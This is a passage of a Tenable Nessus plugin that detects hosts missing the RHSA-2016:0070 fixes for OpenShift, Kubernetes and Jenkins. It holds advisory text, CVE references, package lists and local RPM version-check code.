the API server did\nnot properly check user permissions when handling certain requests. An\nauthenticated remote attacker could use this flaw to gain additional\naccess to resources such as RAM and disk space. (CVE-2016-1905)\n\nAn authorization flaw was discovered in Kubernetes; the API server did\nnot properly check user permissions when handling certain build-\nconfiguration strategies. A remote attacker could create build\nconfigurations with strategies that violate policy. Although the\nattacker could not launch the build themselves (launch fails when the\npolicy is violated), if the build configuration files were later\nlaunched by other privileged services (such as automated triggers),\nuser privileges could be bypassed allowing attacker escalation.\n(CVE-2016-1906)\n\nAn update for Jenkins Continuous Integration Server that addresses a\nlarge number of security issues including XSS, CSRF, information\ndisclosure and code execution have been addressed as well.\n(CVE-2013-2186, CVE-2014-1869, CVE-2014-3661, CVE-2014-3662\nCVE-2014-3663, CVE-2014-3664, CVE-2014-3666, CVE-2014-3667\nCVE-2014-3680, CVE-2014-3681, CVE-2015-1806, CVE-2015-1807\nCVE-2015-1808, CVE-2015-1810, CVE-2015-1812, CVE-2015-1813\nCVE-2015-1814, CVE-2015-5317, CVE-2015-5318, CVE-2015-5319\nCVE-2015-5320, CVE-2015-5321, CVE-2015-5322, CVE-2015-5323\nCVE-2015-5324, CVE-2015-5325, CVE-2015-5326 ,CVE-2015-7537\nCVE-2015-7538, CVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes and enhancements in\nthis advisory. See the OpenShift Enterprise 3.1 Release Notes, which\nwill be updated shortly for release 3.1.1, for details about these\nchanges :\n\nhttps://docs.openshift.com/enterprise/3.1/release_notes/\nose_3_1_release_notes.html\n\nAll OpenShift Enterprise 3 users are advised to upgrade to these\nupdated packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0070\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2016-23\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-dockerregistry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-recycle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:heapster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-align-text\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ansi-green\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ansi-wrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-anymatch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arr-diff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arr-flatten\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-array-unique\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arrify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-async-each\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-binary-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-braces\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-capture-stack-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-chokidar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-configstore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-create-error-class\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-deep-extend\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-duplexer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-duplexify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-end-of-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-error-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-es6-promise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-event-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-expand-brackets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-expand-range\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-extglob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-filename-regex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-fill-range\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-for-in\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-for-own\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-from\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-glob-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-glob-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-got\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-graceful-fs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-binary-path\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-dotfile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-equal-shallow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-extendable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-extglob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-glob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-npm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-number\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-plain-obj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-primitive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-redirect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-isobject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-kind-of\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-latest-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lazy-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.assign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.baseassign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.basecopy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.bindcallback\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.createassigner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.defaults\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.getnative\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isarguments\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isarray\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isiterateecall\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.keys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.restparam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lowercase-keys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-map-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-micromatch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-mkdirp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-node-status-codes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-nodemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-normalize-path\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-object-assign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-object.omit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-optimist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-os-homedir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-os-tmpdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-osenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-package-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-parse-glob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-parse-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pause-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pinkie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pinkie-promise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-prepend-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-preserve\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ps-tree\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-randomatic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-rc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-read-all-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-readdirp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-regex-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-registry-url\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-repeat-element\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-semver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-semver-diff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-slide\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-split\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-stream-combiner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-string-length\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-strip-json-comments\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-success-symbol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-through\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-timed-out\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-touch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-undefsafe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-unzip-response\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-update-notifier\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-url-parse-lax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-uuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-write-file-atomic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-xdg-basedir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss_wrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss_wrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-filter-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-lookup-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-playbooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-roles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:origin-kibana\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tuned-profiles-atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0070\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_exists(rpm:\"atomic-openshift-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-redistributable-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-redistributable-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-dockerregistry-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-dockerregistry-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-master-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-master-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-pod-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-pod-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-recycle-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-recycle-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-sdn-ovs-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-sdn-ovs-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-utils-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-utils-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"heapster-0.18.2-3.gitaf4752e.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jenkins-1.625.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-align-text-0.1.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ansi-green-0.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ansi-wrap-0.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-anymatch-1.3.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arr-diff-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arr-flatten-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-array-unique-0.2.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arrify-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-async-each-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-binary-extensions-1.3.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-braces-1.8.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-capture-stack-trace-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-chokidar-1.4.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-configstore-1.4.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-create-error-class-2.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-deep-extend-0.3.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-duplexer-0.1.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-duplexify-3.4.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-end-of-stream-1.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", 